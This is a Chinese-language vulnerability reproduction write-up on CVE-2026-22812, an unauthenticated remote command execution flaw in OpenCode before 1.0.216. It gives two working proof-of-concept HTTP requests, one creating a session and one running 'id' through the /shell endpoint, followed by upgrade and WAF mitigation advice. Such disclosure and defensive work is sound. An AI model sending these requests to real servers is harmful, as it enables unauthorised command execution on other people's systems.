文章总结： OpenCode1.0.216之前版本存在远程代码执行漏洞(CVE-2026-22812)，未经身份验证可通过/session接口创建会话并利用/shell接口执行任意系统命令。漏洞复现演示了通过HTTP请求成功执行id命令的过程，同时提供nuclei检测规则。建议立即升级至1.0.216版本或通过WAF限制接口访问，并加强日志审计与认证配置。 综合评分： 85 文章分类： 漏洞分析,WEB安全,渗透测试,安全工具,漏洞预警

【成功复现】OpenCode远程代码执行漏洞(CVE-2026-22812)

原创

弥天安全实验室 弥天安全实验室

弥天安全实验室

2026年4月3日 18:16 陕西

网安引领时代，弥天点亮未来

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

0x01漏洞介绍

opencode是Anomaly开源的一个AI编程智能体，面向开发与运维场景的代码管理与构建服务，通常以 Web 方式对外提供会话管理和构建/执行能力。

opencode 1.0.216之前版本存在安全漏洞，该漏洞源于自动启动未经身份验证的HTTP服务器，可能导致执行任意shell命令。

0x02影响版本

OpenCode < 1.0.216

0x03漏洞复现

1.访问漏洞环境

2.漏洞复现

poc

1、获取session

POST /session HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0Connection: closeContent-Length: 2Content-Type: application/jsonAccept-Encoding: gzip, deflate
{}

2、成功执行id命令

POST /session/ses_2adacbaf9ffe7CMOd1ziF98lxn/shell HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Connection: closeContent-Length: 32Content-Type: application/jsonAccept-Encoding: gzip, deflate
{"agent":"build","command":"id"}

3.nuclei工具测试漏洞存在

已输出检测双向规则

0x04修复建议****

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

临时缓解方案

1、在 WAF、IDS/IPS 中部署基于 POC 的检测规则，识别针对该漏洞的探测与攻击行为。通过防火墙、反向代理或 WAF 限制或封堵对 /session 及 /session/*/shell 接口的外部访问。

2、安全排查与加固：检查服务器日志中是否存在未认证的会话创建和命令执行记录，并加强接口认证与访问审计配置。

建议尽快升级修复漏洞，再次声明本文仅供学习使用，非法他用责任自负！

https://github.com/anomalyco/opencode/releases

弥天简介

学海浩茫，予以风动，必降弥天之润！弥天安全实验室成立于2019年2月19日，主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子，也是民间组织。主要以技术共享、交流等不断赋能自己，赋能安全圈，为网络安全发展贡献自己的微薄之力。

口号 网安引领时代，弥天点亮未来

知识分享完了

喜欢别忘了关注我们哦~

学海浩茫，

予以风动，

必降弥天之润！

弥  天

安全实验室

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：弥天安全实验室 弥天安全实验室 弥天安全实验室《【成功复现】OpenCode远程代码执行漏洞(CVE-2026-22812)》